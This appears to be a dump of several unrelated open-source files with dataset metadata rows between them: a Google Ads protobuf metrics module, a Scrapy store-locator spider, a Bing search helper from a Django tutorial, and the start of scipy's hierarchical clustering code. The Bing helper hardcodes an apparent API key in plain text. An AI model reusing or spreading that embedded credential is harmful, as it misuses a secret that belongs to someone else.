include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
current_model_attributed_conversions_from_interactions_rate (float):
Current model attributed conversions from interactions
divided by the number of ad interactions (such as clicks for
text ads or views for video ads). This only includes
conversion actions which include_in_conversions_metric
attribute is set to true. If you use conversion-based
bidding, your bid strategies will optimize for these
conversions.
current_model_attributed_conversions_from_interactions_value_per_interaction (float):
The value of current model attributed conversions from
interactions divided by the number of ad interactions. This
only includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
current_model_attributed_conversions_value (float):
The value of current model attributed conversions. This only
includes conversion actions which
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
current_model_attributed_conversions_value_per_cost (float):
The value of current model attributed conversions divided by
the cost of ad interactions. This only includes conversion
actions which include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
engagement_rate (float):
How often people engage with your ad after
it's shown to them. This is the number of ad
expansions divided by the number of times your
ad is shown.
engagements (int):
The number of engagements.
An engagement occurs when a viewer expands your
Lightbox ad. Also, in the future, other ad types
may support engagement metrics.
hotel_average_lead_value_micros (float):
Average lead value based on clicks.
hotel_price_difference_percentage (float):
The average price difference between the
price offered by reporting hotel advertiser and
the cheapest price offered by the competing
advertiser.
hotel_eligible_impressions (int):
The number of impressions that hotel partners
could have had given their feed performance.
historical_creative_quality_score (google.ads.googleads.v6.enums.types.QualityScoreBucketEnum.QualityScoreBucket):
The creative historical quality score.
historical_landing_page_quality_score (google.ads.googleads.v6.enums.types.QualityScoreBucketEnum.QualityScoreBucket):
The quality of historical landing page
experience.
historical_quality_score (int):
The historical quality score.
historical_search_predicted_ctr (google.ads.googleads.v6.enums.types.QualityScoreBucketEnum.QualityScoreBucket):
The historical search predicted click through
rate (CTR).
gmail_forwards (int):
The number of times the ad was forwarded to
someone else as a message.
gmail_saves (int):
The number of times someone has saved your
Gmail ad to their inbox as a message.
gmail_secondary_clicks (int):
The number of clicks to the landing page on
the expanded state of Gmail ads.
impressions_from_store_reach (int):
The number of times a store's location-based
ad was shown. This metric applies to feed items
only.
impressions (int):
Count of how often your ad has appeared on a
search results page or website on the Google
Network.
interaction_rate (float):
How often people interact with your ad after
it is shown to them. This is the number of
interactions divided by the number of times your
ad is shown.
interactions (int):
The number of interactions.
An interaction is the main user action
associated with an ad format-clicks for text and
shopping ads, views for video ads, and so on.
interaction_event_types (Sequence[google.ads.googleads.v6.enums.types.InteractionEventTypeEnum.InteractionEventType]):
The types of payable and free interactions.
invalid_click_rate (float):
The percentage of clicks filtered out of your
total number of clicks (filtered + non-filtered
clicks) during the reporting period.
invalid_clicks (int):
Number of clicks Google considers
illegitimate and doesn't charge you for.
message_chats (int):
Number of message chats initiated for Click
To Message impressions that were message
tracking eligible.
message_impressions (int):
Number of Click To Message impressions that
were message tracking eligible.
message_chat_rate (float):
Number of message chats initiated (message_chats) divided by
the number of message impressions (message_impressions).
Rate at which a user initiates a message chat from an ad
impression with a messaging option and message tracking
enabled. Note that this rate can be more than 1.0 for a
given message impression.
mobile_friendly_clicks_percentage (float):
The percentage of mobile clicks that go to a
mobile-friendly page.
organic_clicks (int):
The number of times someone clicked your
site's listing in the unpaid results for a
particular query. See the help page at
            https://support.google.com/google-ads/answer/3097241 for details.
organic_clicks_per_query (float):
The number of times someone clicked your site's listing in
the unpaid results (organic_clicks) divided by the total
number of searches that returned pages from your site
(organic_queries). See the help page at
https://support.google.com/google-ads/answer/3097241 for
details.
organic_impressions (int):
The number of listings for your site in the
unpaid search results. See the help page at
            https://support.google.com/google-ads/answer/3097241 for details.
organic_impressions_per_query (float):
The number of times a page from your site was listed in the
unpaid search results (organic_impressions) divided by the
number of searches returning your site's listing in the
unpaid results (organic_queries). See the help page at
https://support.google.com/google-ads/answer/3097241 for
details.
organic_queries (int):
The total number of searches that returned
your site's listing in the unpaid results. See
the help page at
            https://support.google.com/google-ads/answer/3097241 for details.
percent_new_visitors (float):
Percentage of first-time sessions (from
people who had never visited your site before).
Imported from Google Analytics.
phone_calls (int):
Number of offline phone calls.
phone_impressions (int):
Number of offline phone impressions.
phone_through_rate (float):
Number of phone calls received (phone_calls) divided by the
number of times your phone number is shown
(phone_impressions).
relative_ctr (float):
Your clickthrough rate (Ctr) divided by the
average clickthrough rate of all advertisers on
the websites that show your ads. Measures how
your ads perform on Display Network sites
compared to other ads on the same sites.
search_absolute_top_impression_share (float):
The percentage of the customer's Shopping or
Search ad impressions that are shown in the most
prominent Shopping position. See
            https://support.google.com/google-ads/answer/7501826 for
            details. Any value below
0.1 is reported as 0.0999.
search_budget_lost_absolute_top_impression_share (float):
The number estimating how often your ad
wasn't the very first ad above the organic
search results due to a low budget. Note: Search
budget lost absolute top impression share is
reported in the range of 0 to 0.9. Any value
above 0.9 is reported as 0.9001.
search_budget_lost_impression_share (float):
The estimated percent of times that your ad
was eligible to show on the Search Network but
didn't because your budget was too low. Note:
Search budget lost impression share is reported
in the range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
search_budget_lost_top_impression_share (float):
The number estimating how often your ad
didn't show anywhere above the organic search
results due to a low budget. Note: Search budget
lost top impression share is reported in the
range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
search_click_share (float):
The number of clicks you've received on the
Search Network divided by the estimated number
of clicks you were eligible to receive. Note:
Search click share is reported in the range of
0.1 to 1. Any value below 0.1 is reported as
0.0999.
search_exact_match_impression_share (float):
The impressions you've received divided by
the estimated number of impressions you were
eligible to receive on the Search Network for
search terms that matched your keywords exactly
(or were close variants of your keyword),
regardless of your keyword match types. Note:
Search exact match impression share is reported
in the range of 0.1 to 1. Any value below 0.1 is
reported as 0.0999.
search_impression_share (float):
The impressions you've received on the Search
Network divided by the estimated number of
impressions you were eligible to receive. Note:
Search impression share is reported in the range
of 0.1 to 1. Any value below 0.1 is reported as
0.0999.
search_rank_lost_absolute_top_impression_share (float):
The number estimating how often your ad
wasn't the very first ad above the organic
search results due to poor Ad Rank. Note: Search
rank lost absolute top impression share is
reported in the range of 0 to 0.9. Any value
above 0.9 is reported as 0.9001.
search_rank_lost_impression_share (float):
The estimated percentage of impressions on
the Search Network that your ads didn't receive
due to poor Ad Rank. Note: Search rank lost
impression share is reported in the range of 0
to 0.9. Any value above 0.9 is reported as
0.9001.
search_rank_lost_top_impression_share (float):
The number estimating how often your ad
didn't show anywhere above the organic search
results due to poor Ad Rank. Note: Search rank
lost top impression share is reported in the
range of 0 to 0.9. Any value above 0.9 is
reported as 0.9001.
search_top_impression_share (float):
The impressions you've received in the top
location (anywhere above the organic search
results) compared to the estimated number of
impressions you were eligible to receive in the
top location. Note: Search top impression share
is reported in the range of 0.1 to 1. Any value
below 0.1 is reported as 0.0999.
speed_score (int):
A measure of how quickly your page loads
after clicks on your mobile ads. The score is a
range from 1 to 10, 10 being the fastest.
top_impression_percentage (float):
The percent of your ad impressions that are
shown anywhere above the organic search results.
valid_accelerated_mobile_pages_clicks_percentage (float):
The percentage of ad clicks to Accelerated
Mobile Pages (AMP) landing pages that reach a
valid AMP page.
value_per_all_conversions (float):
The value of all conversions divided by the
number of all conversions.
value_per_all_conversions_by_conversion_date (float):
The value of all conversions divided by the number of all
conversions. When this column is selected with date, the
values in date column means the conversion date. Details for
the by_conversion_date columns are available at
https://support.google.com/google-ads/answer/9549009.
value_per_conversion (float):
The value of conversions divided by the number of
            conversions. This only includes conversion actions whose
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions.
value_per_conversions_by_conversion_date (float):
The value of conversions divided by the number of
            conversions. This only includes conversion actions whose
include_in_conversions_metric attribute is set to true. If
you use conversion-based bidding, your bid strategies will
optimize for these conversions. When this column is selected
            with date, the values in the date column mean the conversion
date. Details for the by_conversion_date columns are
available at
https://support.google.com/google-ads/answer/9549009.
value_per_current_model_attributed_conversion (float):
The value of current model attributed conversions divided by
            the number of those conversions. This only includes conversion
            actions whose include_in_conversions_metric attribute is set
to true. If you use conversion-based bidding, your bid
strategies will optimize for these conversions.
video_quartile_p100_rate (float):
Percentage of impressions where the viewer
watched all of your video.
video_quartile_p25_rate (float):
Percentage of impressions where the viewer
watched 25% of your video.
video_quartile_p50_rate (float):
Percentage of impressions where the viewer
watched 50% of your video.
video_quartile_p75_rate (float):
Percentage of impressions where the viewer
watched 75% of your video.
video_view_rate (float):
The number of views your TrueView video ad
receives divided by its number of impressions,
            including thumbnail impressions for TrueView
            in-display ads.
video_views (int):
The number of times your video ads were
viewed.
view_through_conversions (int):
The total number of view-through conversions.
These happen when a customer sees an image or
rich media ad, then later completes a conversion
on your site without interacting with (e.g.,
clicking on) another ad.
"""
absolute_top_impression_percentage = proto.Field(
proto.DOUBLE, number=183, optional=True
)
active_view_cpm = proto.Field(proto.DOUBLE, number=184, optional=True)
active_view_ctr = proto.Field(proto.DOUBLE, number=185, optional=True)
active_view_impressions = proto.Field(
proto.INT64, number=186, optional=True
)
active_view_measurability = proto.Field(
proto.DOUBLE, number=187, optional=True
)
active_view_measurable_cost_micros = proto.Field(
proto.INT64, number=188, optional=True
)
active_view_measurable_impressions = proto.Field(
proto.INT64, number=189, optional=True
)
active_view_viewability = proto.Field(
proto.DOUBLE, number=190, optional=True
)
all_conversions_from_interactions_rate = proto.Field(
proto.DOUBLE, number=191, optional=True
)
all_conversions_value = proto.Field(proto.DOUBLE, number=192, optional=True)
all_conversions_value_by_conversion_date = proto.Field(
proto.DOUBLE, number=240
)
all_conversions = proto.Field(proto.DOUBLE, number=193, optional=True)
all_conversions_by_conversion_date = proto.Field(proto.DOUBLE, number=241)
all_conversions_value_per_cost = proto.Field(
proto.DOUBLE, number=194, optional=True
)
all_conversions_from_click_to_call = proto.Field(
proto.DOUBLE, number=195, optional=True
)
all_conversions_from_directions = proto.Field(
proto.DOUBLE, number=196, optional=True
)
all_conversions_from_interactions_value_per_interaction = proto.Field(
proto.DOUBLE, number=197, optional=True
)
all_conversions_from_menu = proto.Field(
proto.DOUBLE, number=198, optional=True
)
all_conversions_from_order = proto.Field(
proto.DOUBLE, number=199, optional=True
)
all_conversions_from_other_engagement = proto.Field(
proto.DOUBLE, number=200, optional=True
)
all_conversions_from_store_visit = proto.Field(
proto.DOUBLE, number=201, optional=True
)
all_conversions_from_store_website = proto.Field(
proto.DOUBLE, number=202, optional=True
)
average_cost = proto.Field(proto.DOUBLE, number=203, optional=True)
average_cpc = proto.Field(proto.DOUBLE, number=204, optional=True)
average_cpe = proto.Field(proto.DOUBLE, number=205, optional=True)
average_cpm = proto.Field(proto.DOUBLE, number=206, optional=True)
average_cpv = proto.Field(proto.DOUBLE, number=207, optional=True)
average_page_views = proto.Field(proto.DOUBLE, number=208, optional=True)
average_time_on_site = proto.Field(proto.DOUBLE, number=209, optional=True)
benchmark_average_max_cpc = proto.Field(
proto.DOUBLE, number=210, optional=True
)
benchmark_ctr = proto.Field(proto.DOUBLE, number=211, optional=True)
bounce_rate = proto.Field(proto.DOUBLE, number=212, optional=True)
clicks = proto.Field(proto.INT64, number=131, optional=True)
combined_clicks = proto.Field(proto.INT64, number=156, optional=True)
combined_clicks_per_query = proto.Field(
proto.DOUBLE, number=157, optional=True
)
combined_queries = proto.Field(proto.INT64, number=158, optional=True)
content_budget_lost_impression_share = proto.Field(
proto.DOUBLE, number=159, optional=True
)
content_impression_share = proto.Field(
proto.DOUBLE, number=160, optional=True
)
conversion_last_received_request_date_time = proto.Field(
proto.STRING, number=161, optional=True
)
conversion_last_conversion_date = proto.Field(
proto.STRING, number=162, optional=True
)
content_rank_lost_impression_share = proto.Field(
proto.DOUBLE, number=163, optional=True
)
conversions_from_interactions_rate = proto.Field(
proto.DOUBLE, number=164, optional=True
)
conversions_value = proto.Field(proto.DOUBLE, number=165, optional=True)
conversions_value_by_conversion_date = proto.Field(proto.DOUBLE, number=242)
conversions_value_per_cost = proto.Field(
proto.DOUBLE, number=166, optional=True
)
conversions_from_interactions_value_per_interaction = proto.Field(
proto.DOUBLE, number=167, optional=True
)
conversions = proto.Field(proto.DOUBLE, number=168, optional=True)
conversions_by_conversion_date = proto.Field(proto.DOUBLE, number=243)
cost_micros = proto.Field(proto.INT64, number=169, optional=True)
cost_per_all_conversions = proto.Field(
proto.DOUBLE, number=170, optional=True
)
cost_per_conversion = proto.Field(proto.DOUBLE, number=171, optional=True)
cost_per_current_model_attributed_conversion = proto.Field(
proto.DOUBLE, number=172, optional=True
)
cross_device_conversions = proto.Field(
proto.DOUBLE, number=173, optional=True
)
ctr = proto.Field(proto.DOUBLE, number=174, optional=True)
current_model_attributed_conversions = proto.Field(
proto.DOUBLE, number=175, optional=True
)
current_model_attributed_conversions_from_interactions_rate = proto.Field(
proto.DOUBLE, number=176, optional=True
)
current_model_attributed_conversions_from_interactions_value_per_interaction = proto.Field(
proto.DOUBLE, number=177, optional=True
)
current_model_attributed_conversions_value = proto.Field(
proto.DOUBLE, number=178, optional=True
)
current_model_attributed_conversions_value_per_cost = proto.Field(
proto.DOUBLE, number=179, optional=True
)
engagement_rate = proto.Field(proto.DOUBLE, number=180, optional=True)
engagements = proto.Field(proto.INT64, number=181, optional=True)
hotel_average_lead_value_micros = proto.Field(
proto.DOUBLE, number=213, optional=True
)
hotel_price_difference_percentage = proto.Field(
proto.DOUBLE, number=214, optional=True
)
hotel_eligible_impressions = proto.Field(
proto.INT64, number=215, optional=True
)
historical_creative_quality_score = proto.Field(
proto.ENUM,
number=80,
enum=quality_score_bucket.QualityScoreBucketEnum.QualityScoreBucket,
)
historical_landing_page_quality_score = proto.Field(
proto.ENUM,
number=81,
enum=quality_score_bucket.QualityScoreBucketEnum.QualityScoreBucket,
)
historical_quality_score = proto.Field(
proto.INT64, number=216, optional=True
)
historical_search_predicted_ctr = proto.Field(
proto.ENUM,
number=83,
enum=quality_score_bucket.QualityScoreBucketEnum.QualityScoreBucket,
)
gmail_forwards = proto.Field(proto.INT64, number=217, optional=True)
gmail_saves = proto.Field(proto.INT64, number=218, optional=True)
gmail_secondary_clicks = proto.Field(proto.INT64, number=219, optional=True)
impressions_from_store_reach = proto.Field(
proto.INT64, number=220, optional=True
)
impressions = proto.Field(proto.INT64, number=221, optional=True)
interaction_rate = proto.Field(proto.DOUBLE, number=222, optional=True)
interactions = proto.Field(proto.INT64, number=223, optional=True)
interaction_event_types = proto.RepeatedField(
proto.ENUM,
number=100,
enum=interaction_event_type.InteractionEventTypeEnum.InteractionEventType,
)
invalid_click_rate = proto.Field(proto.DOUBLE, number=224, optional=True)
invalid_clicks = proto.Field(proto.INT64, number=225, optional=True)
message_chats = proto.Field(proto.INT64, number=226, optional=True)
message_impressions = proto.Field(proto.INT64, number=227, optional=True)
message_chat_rate = proto.Field(proto.DOUBLE, number=228, optional=True)
mobile_friendly_clicks_percentage = proto.Field(
proto.DOUBLE, number=229, optional=True
)
organic_clicks = proto.Field(proto.INT64, number=230, optional=True)
organic_clicks_per_query = proto.Field(
proto.DOUBLE, number=231, optional=True
)
organic_impressions = proto.Field(proto.INT64, number=232, optional=True)
organic_impressions_per_query = proto.Field(
proto.DOUBLE, number=233, optional=True
)
organic_queries = proto.Field(proto.INT64, number=234, optional=True)
percent_new_visitors = proto.Field(proto.DOUBLE, number=235, optional=True)
phone_calls = proto.Field(proto.INT64, number=236, optional=True)
phone_impressions = proto.Field(proto.INT64, number=237, optional=True)
phone_through_rate = proto.Field(proto.DOUBLE, number=238, optional=True)
relative_ctr = proto.Field(proto.DOUBLE, number=239, optional=True)
search_absolute_top_impression_share = proto.Field(
proto.DOUBLE, number=136, optional=True
)
search_budget_lost_absolute_top_impression_share = proto.Field(
proto.DOUBLE, number=137, optional=True
)
search_budget_lost_impression_share = proto.Field(
proto.DOUBLE, number=138, optional=True
)
search_budget_lost_top_impression_share = proto.Field(
proto.DOUBLE, number=139, optional=True
)
search_click_share = proto.Field(proto.DOUBLE, number=140, optional=True)
search_exact_match_impression_share = proto.Field(
proto.DOUBLE, number=141, optional=True
)
search_impression_share = proto.Field(
proto.DOUBLE, number=142, optional=True
)
search_rank_lost_absolute_top_impression_share = proto.Field(
proto.DOUBLE, number=143, optional=True
)
search_rank_lost_impression_share = proto.Field(
proto.DOUBLE, number=144, optional=True
)
search_rank_lost_top_impression_share = proto.Field(
proto.DOUBLE, number=145, optional=True
)
search_top_impression_share = proto.Field(
proto.DOUBLE, number=146, optional=True
)
speed_score = proto.Field(proto.INT64, number=147, optional=True)
top_impression_percentage = proto.Field(
proto.DOUBLE, number=148, optional=True
)
valid_accelerated_mobile_pages_clicks_percentage = proto.Field(
proto.DOUBLE, number=149, optional=True
)
value_per_all_conversions = proto.Field(
proto.DOUBLE, number=150, optional=True
)
value_per_all_conversions_by_conversion_date = proto.Field(
proto.DOUBLE, number=244, optional=True
)
value_per_conversion = proto.Field(proto.DOUBLE, number=151, optional=True)
value_per_conversions_by_conversion_date = proto.Field(
proto.DOUBLE, number=245, optional=True
)
value_per_current_model_attributed_conversion = proto.Field(
proto.DOUBLE, number=152, optional=True
)
video_quartile_p100_rate = proto.Field(
proto.DOUBLE, number=132, optional=True
)
video_quartile_p25_rate = proto.Field(
proto.DOUBLE, number=133, optional=True
)
video_quartile_p50_rate = proto.Field(
proto.DOUBLE, number=134, optional=True
)
video_quartile_p75_rate = proto.Field(
proto.DOUBLE, number=135, optional=True
)
video_view_rate = proto.Field(proto.DOUBLE, number=153, optional=True)
video_views = proto.Field(proto.INT64, number=154, optional=True)
view_through_conversions = proto.Field(
proto.INT64, number=155, optional=True
)
__all__ = tuple(sorted(__protobuf__.manifest))
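# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the generated protobuf module): the metric
# fields documented above are normally selected through a GAQL query rather
# than constructed by hand. The snippet assumes a configured google-ads.yaml
# and a placeholder customer id.
#
#   from google.ads.googleads.client import GoogleAdsClient
#
#   client = GoogleAdsClient.load_from_storage()
#   ga_service = client.get_service("GoogleAdsService")
#   query = """
#       SELECT campaign.id, metrics.clicks, metrics.impressions, metrics.ctr
#       FROM campaign
#       WHERE segments.date DURING LAST_7_DAYS
#   """
#   for row in ga_service.search(customer_id="1234567890", query=query):
#       print(row.campaign.id, row.metrics.clicks, row.metrics.ctr)
# ---------------------------------------------------------------------------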
|
apache-2.0
| 7,806,873,479,053,634,000
| 47.843607
| 126
| 0.65375
| false
| 4.40422
| false
| false
| false
|
iandees/all-the-places
|
locations/spiders/aubonpain.py
|
1
|
2580
|
import scrapy
import re
import json
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
class AuBonPainSpider(scrapy.Spider):
name = "aubonpain"
download_delay = 0.5
allowed_domains = [
"www.aubonpain.com",
]
start_urls = (
'https://www.aubonpain.com/stores/all-stores',
)
def parse_hours(self, items):
opening_hours = OpeningHours()
for day in items:
open_time = day["Open"]
close_time = day["Close"]
if close_time == 'Closed' or open_time == 'Closed':
continue
elif close_time == 'Open 24 Hrs' or open_time == 'Open 24 Hrs':
open_time = '12:00 AM'
close_time = '12:00 AM'
elif close_time == 'Open for Special Events':
continue
opening_hours.add_range(day=day["Day"][:2],
open_time=open_time,
close_time=close_time,
time_format='%I:%M %p')
return opening_hours.as_opening_hours()
def parse_store(self, response):
ref = re.findall(r"[^(\/)]+$", response.url)[0]
scripts = "".join(response.xpath('//script/text()').extract())
lat, lon = re.search(r'.*Microsoft.Maps.Location\(([0-9.-]*),\s+([0-9-.]*)\).*', scripts).groups()
address1, address2 = response.xpath('//dt[contains(text(), "Address")]/following-sibling::dd/text()').extract()
city, state, zipcode = re.search(r'^(.*),\s+([a-z]{2})\s+([0-9]+)$', address2.strip(), re.IGNORECASE).groups()
properties = {
'addr_full': address1.strip(', '),
'phone': response.xpath('//dt[contains(text(), "Phone")]/following-sibling::dd/a/text()').extract_first(),
'city': city,
'state': state,
'postcode': zipcode,
'ref': ref,
'website': response.url,
'lat': float(lat),
'lon': float(lon),
}
hours = json.loads(re.search(r'.*var\shours\s*=\s*(.*?);.*', scripts).groups()[0])
hours = self.parse_hours(hours)
if hours:
properties['opening_hours'] = hours
yield GeojsonPointItem(**properties)
def parse(self, response):
urls = response.xpath('//section/div/div//a[contains(@href, "stores")]/@href').extract()
for url in urls:
url = url.replace('\r\n', '')
yield scrapy.Request(response.urljoin(url), callback=self.parse_store)
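# Hedged usage notes (not part of the spider itself): within an
# all-the-places style Scrapy project this spider would typically be run as
#   scrapy crawl aubonpain -o aubonpain.geojson
# parse_hours() expects the per-day structure embedded in each store page,
# e.g. [{"Day": "Monday", "Open": "7:00 AM", "Close": "9:00 PM"}, ...], and
# returns an OSM-style opening_hours string such as "Mo 07:00-21:00".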
|
mit
| -4,718,689,655,118,514,000
| 35.857143
| 119
| 0.527907
| false
| 3.722944
| false
| false
| false
|
douglasbgatti/rango-tutorial
|
tango_with_django_project/rango/bing_search.py
|
1
|
2360
|
import json
import urllib, urllib2
BING_API_KEY = '6uAUnyT0WuPBRqv5+AZIuWrpNsKJ++t0E9Sp9DDkh3Q'
def run_query(search_terms):
    # Specify the base URL and the search service to use.
root_url = 'https://api.datamarket.azure.com/Bing/Search/v1/'
source = 'Web'
# Specify how many results we wish to be returned per page.
# Offset specifies where in the results list to start from.
# With results_per_page = 10 and offset = 11, this would start from page 2.
results_per_page = 10
offset = 11
# Wrap quotes around our query terms as required by the Bing API.
# The query we will then use is stored within variable query.
query = "'{0}'".format(search_terms)
query = urllib.quote(query)
# Construct the latter part of our request's URL.
# Sets the format of the response to JSON and sets other properties.
search_url = "{0}{1}?$format=json&$top={2}&$skip={3}&Query={4}".format(
root_url,
source,
results_per_page,
offset,
query)
# Setup authentication with the Bing servers.
    # The username MUST be a blank string; the API key is used as the password.
username = ''
# Create a 'password manager' which handles authentication for us.
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, search_url, username, BING_API_KEY)
# Create our results list which we'll populate.
results = []
try:
# Prepare for connecting to Bing's servers.
handler = urllib2.HTTPBasicAuthHandler(password_mgr)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
# Connect to the server and read the response generated.
response = urllib2.urlopen(search_url).read()
# Convert the string response to a Python dictionary object.
json_response = json.loads(response)
# Loop through each page returned, populating out results list.
for result in json_response['d']['results']:
results.append({
'title': result['Title'],
'link': result['Url'],
'summary': result['Description']})
# Catch a URLError exception - something went wrong when connecting!
except urllib2.URLError, e:
print "Error when querying the Bing API: ", e
# Return the list of results to the calling function.
return results
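# Hedged usage sketch (assumes a valid BING_API_KEY and network access); the
# module is written for Python 2, so the print statement below matches that.
if __name__ == '__main__':
    for hit in run_query("rango"):
        print hit['title'], '->', hit['link']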
|
apache-2.0
| 702,510,726,307,883,600
| 34.238806
| 79
| 0.659322
| false
| 3.959732
| false
| false
| false
|
njwilson23/scipy
|
scipy/cluster/hierarchy.py
|
1
|
91969
|
"""
========================================================
Hierarchical clustering (:mod:`scipy.cluster.hierarchy`)
========================================================
.. currentmodule:: scipy.cluster.hierarchy
These functions cut hierarchical clusterings into flat clusterings
or find the roots of the forest formed by a cut by providing the flat
cluster ids of each observation.
.. autosummary::
:toctree: generated/
fcluster
fclusterdata
leaders
These are routines for agglomerative clustering.
.. autosummary::
:toctree: generated/
linkage
single
complete
average
weighted
centroid
median
ward
These routines compute statistics on hierarchies.
.. autosummary::
:toctree: generated/
cophenet
from_mlab_linkage
inconsistent
maxinconsts
maxdists
maxRstat
to_mlab_linkage
Routines for visualizing flat clusters.
.. autosummary::
:toctree: generated/
dendrogram
These are data structures and routines for representing hierarchies as
tree objects.
.. autosummary::
:toctree: generated/
ClusterNode
leaves_list
to_tree
These are predicates for checking the validity of linkage and
inconsistency matrices as well as for checking isomorphism of two
flat cluster assignments.
.. autosummary::
:toctree: generated/
is_valid_im
is_valid_linkage
is_isomorphic
is_monotonic
correspond
num_obs_linkage
Utility routines for plotting:
.. autosummary::
:toctree: generated/
set_link_color_palette
References
----------
.. [1] "Statistics toolbox." API Reference Documentation. The MathWorks.
http://www.mathworks.com/access/helpdesk/help/toolbox/stats/.
Accessed October 1, 2007.
.. [2] "Hierarchical clustering." API Reference Documentation.
The Wolfram Research, Inc.
http://reference.wolfram.com/mathematica/HierarchicalClustering/tutorial/
HierarchicalClustering.html.
Accessed October 1, 2007.
.. [3] Gower, JC and Ross, GJS. "Minimum Spanning Trees and Single Linkage
Cluster Analysis." Applied Statistics. 18(1): pp. 54--64. 1969.
.. [4] Ward Jr, JH. "Hierarchical grouping to optimize an objective
function." Journal of the American Statistical Association. 58(301):
pp. 236--44. 1963.
.. [5] Johnson, SC. "Hierarchical clustering schemes." Psychometrika.
32(2): pp. 241--54. 1966.
.. [6] Sneath, PH and Sokal, RR. "Numerical taxonomy." Nature. 193: pp.
855--60. 1962.
.. [7] Batagelj, V. "Comparing resemblance measures." Journal of
Classification. 12: pp. 73--90. 1995.
.. [8] Sokal, RR and Michener, CD. "A statistical method for evaluating
systematic relationships." Scientific Bulletins. 38(22):
pp. 1409--38. 1958.
.. [9] Edelbrock, C. "Mixture model tests of hierarchical clustering
algorithms: the problem of classifying everybody." Multivariate
Behavioral Research. 14: pp. 367--84. 1979.
.. [10] Jain, A., and Dubes, R., "Algorithms for Clustering Data."
Prentice-Hall. Englewood Cliffs, NJ. 1988.
.. [11] Fisher, RA "The use of multiple measurements in taxonomic
problems." Annals of Eugenics, 7(2): 179-188. 1936
* MATLAB and MathWorks are registered trademarks of The MathWorks, Inc.
* Mathematica is a registered trademark of The Wolfram Research, Inc.
"""
from __future__ import division, print_function, absolute_import
# Copyright (C) Damian Eads, 2007-2008. New BSD License.
# hierarchy.py (derived from cluster.py, http://scipy-cluster.googlecode.com)
#
# Author: Damian Eads
# Date: September 22, 2007
#
# Copyright (c) 2007, 2008, Damian Eads
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# - Redistributions of source code must retain the above
# copyright notice, this list of conditions and the
# following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# - Neither the name of the author nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import warnings
import numpy as np
from . import _hierarchy
import scipy.spatial.distance as distance
from scipy._lib.six import string_types
from scipy._lib.six import xrange
_cpy_non_euclid_methods = {'single': 0, 'complete': 1, 'average': 2,
'weighted': 6}
_cpy_euclid_methods = {'centroid': 3, 'median': 4, 'ward': 5}
_cpy_linkage_methods = set(_cpy_non_euclid_methods.keys()).union(
set(_cpy_euclid_methods.keys()))
__all__ = ['ClusterNode', 'average', 'centroid', 'complete', 'cophenet',
'correspond', 'dendrogram', 'fcluster', 'fclusterdata',
'from_mlab_linkage', 'inconsistent', 'is_isomorphic',
'is_monotonic', 'is_valid_im', 'is_valid_linkage', 'leaders',
'leaves_list', 'linkage', 'maxRstat', 'maxdists', 'maxinconsts',
'median', 'num_obs_linkage', 'set_link_color_palette', 'single',
'to_mlab_linkage', 'to_tree', 'ward', 'weighted', 'distance']
def _warning(s):
warnings.warn('scipy.cluster: %s' % s, stacklevel=3)
def _copy_array_if_base_present(a):
"""
Copies the array if its base points to a parent array.
"""
if a.base is not None:
return a.copy()
elif np.issubsctype(a, np.float32):
return np.array(a, dtype=np.double)
else:
return a
def _copy_arrays_if_base_present(T):
"""
Accepts a tuple of arrays T. Copies the array T[i] if its base array
points to an actual array. Otherwise, the reference is just copied.
This is useful if the arrays are being passed to a C function that
does not do proper striding.
"""
l = [_copy_array_if_base_present(a) for a in T]
return l
def _randdm(pnts):
""" Generates a random distance matrix stored in condensed form. A
pnts * (pnts - 1) / 2 sized vector is returned.
"""
if pnts >= 2:
        D = np.random.rand(pnts * (pnts - 1) // 2)
else:
raise ValueError("The number of points in the distance matrix "
"must be at least 2.")
return D
def single(y):
"""
Performs single/min/nearest linkage on the condensed distance matrix ``y``
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
The linkage matrix.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='single', metric='euclidean')
def complete(y):
"""
Performs complete/max/farthest point linkage on a condensed distance matrix
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage
"""
return linkage(y, method='complete', metric='euclidean')
def average(y):
"""
Performs average/UPGMA linkage on a condensed distance matrix
Parameters
----------
y : ndarray
